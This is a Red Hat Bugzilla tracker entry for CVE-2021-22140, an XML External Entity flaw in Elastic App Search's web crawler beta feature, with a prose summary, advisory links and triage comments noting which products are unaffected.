Bug 1955289 (CVE-2021-22140)

Summary: CVE-2021-22140 Elastic App Search: App Search XML External Entity Injection
Product: [Other] Security Response Reporter: Guilherme de Almeida Suckevicz <gsuckevi>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED NOTABUG QA Contact:
Severity: high Docs Contact:
Priority: high    
Version: unspecifiedCC: aileenc, akoufoud, alazarot, almorale, anstephe, aos-bugs, apevec, apevec, bdettelb, bibryam, bmontgom, chazlett, dbecker, dbruno, drieden, eparis, etirelli, ggaughan, gmalinko, gvarsami, hbraun, ibek, janstey, jburrell, jcantril, jcoleman, jjoyce, jochrist, jokerman, jschluet, jstastny, jwendell, jwon, kconner, krathod, kverlaen, ldimaggi, lhh, lpeer, mburns, mmagr, mnovotny, nstielau, nwallace, pantinor, piotr1212, pjindal, rcernich, rrajasek, rwagner, sclewis, sd-operator-metering, slinaber, sponnaga, steve.traylen, tcunning, tflannag, tkirby, tomckay, twalsh, tzimanyi
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: If docs needed, set a value
Doc Text:
A flaw was found in Elastic Enterprise Search. An attacker, using an XML External Entity Injection (XXE) issue in the App Search web crawler, could craft a malicious sitemap.xml allowing the crawler to traverse the filesystem of the host running the instance and obtain sensitive files. The highest threat from this vulnerability is to data confidentiality.
 Story Points: ---
Clone Of: Environment:
Last Closed: 2021-05-04 10:46:43 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On:    
Bug Blocks: 1955290    

Description Guilherme de Almeida Suckevicz 2021-04-29 19:39:30 UTC 
An XML External Entity Injection issue (XXE) was found in the App Search web crawler beta feature. Using this vector, an attacker whose website is being crawled by App Search could craft a malicious sitemap.xml to traverse the filesystem of the host running the instance and obtain sensitive files.

Reference:
https://discuss.elastic.co/t/7-12-1-security-update/271433
Comment 2 Anten Skrabec 2021-05-01 01:59:16 UTC 
servicemesh-grafana does not include elasticsearch nor the affected code, only connectors that talk to servicemesh.
Comment 3 Eric Christensen 2021-05-03 13:25:50 UTC 
External References:

https://discuss.elastic.co/t/7-12-1-security-update/271433
Comment 4 Product Security DevOps Team 2021-05-04 10:46:43 UTC 
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2021-22140
Comment 5 Przemyslaw Roguski 2021-05-04 15:46:55 UTC 
Statement:

This vulnerability only affects the 'App Search web crawler beta feature' for Elastic Enterprise Search, as noted in the Elastic.co advisory [1]. That feature is not available in the upstream elasticsearch open source namespace on Github [2].

[1] https://discuss.elastic.co/t/7-12-1-security-update/271433
[2] https://github.com/elastic